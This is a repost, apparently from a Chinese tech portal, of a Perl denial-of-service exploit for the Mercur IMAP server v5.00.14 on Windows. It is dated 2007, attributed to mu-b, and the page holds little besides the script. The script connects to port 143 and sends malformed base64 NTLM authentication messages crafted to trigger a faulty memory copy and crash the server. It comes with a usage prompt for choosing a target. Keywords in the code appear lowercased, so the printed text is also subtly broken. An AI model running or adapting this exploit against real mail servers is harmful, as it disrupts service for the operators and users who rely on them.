首页 电脑 电脑学堂 查看内容

Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)

2007-3-21 10:08 861 0

摘要: #!/usr/bin/perl # # mercur-v1.pl # # mercur v5.00.14 (win32) remote exploit # by mu-b - dec 200...
关键词: print socket target send 00 error mercur buf delay connect

#!/usr/bin/perl # # mercur-v1.pl # # mercur v5.00.14 (win32) remote exploit # by mu-b - dec 2006 # # - tested on: mercur v5.00.14 (win32) # ######## use getopt::std; getopts('t:n:', \%arg); use socket; use mime::base64; &print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { &usage; } my $imapd_port = 143; my $send_delay = 1; if (connect_host($target, $imapd_port)) { print("-> * connected\n"); $buf = "1 authenticate ntlm\r\n"; send(socket, $buf, 0); sleep($send_delay); print("-> * sending payload\n"); # src = "ntlmssp....." $buf = "ntlmssp".("a"x100); send(socket, encode_base64($buf)."\r\n", 0); sleep($send_delay); # memcpy(s, src+a, b); print("-> * sending payload 2\n"); $buf = "ntlmssp". "\x69". "\x03\x00\x00\x00". "\xff\xff". # b ("a"x2). "\x00\x00". # a ("a"x2). "\x00\x00". ("a"x2). "\x00\x00". ("a"x2). "\x04\x00". ("a"x6). "\x00\x80". ("a"x6). "\x04\x00". ("a"x12); send(socket, encode_base64($buf)."\r\n", 0); sleep($send_delay); print("-> * successfully sent payload!\n"); } sub print_header { print("mercur v5.00.14 (win32) remote exploit\n"); print("by: <mu-b\@digit-labs.org>\n\n"); } sub usage { print(qq(usage: $0 -t <hostname> -t <hostname> : hostname to test )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die("error: $!\n"); $paddr = sockaddr_in($port, $iaddr) || die("error: $!\n"); $proto = getprotobyname('tcp') || die("error: $!\n"); socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n"); connect(socket, $paddr) || die("error: $!\n"); return(1338); }
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部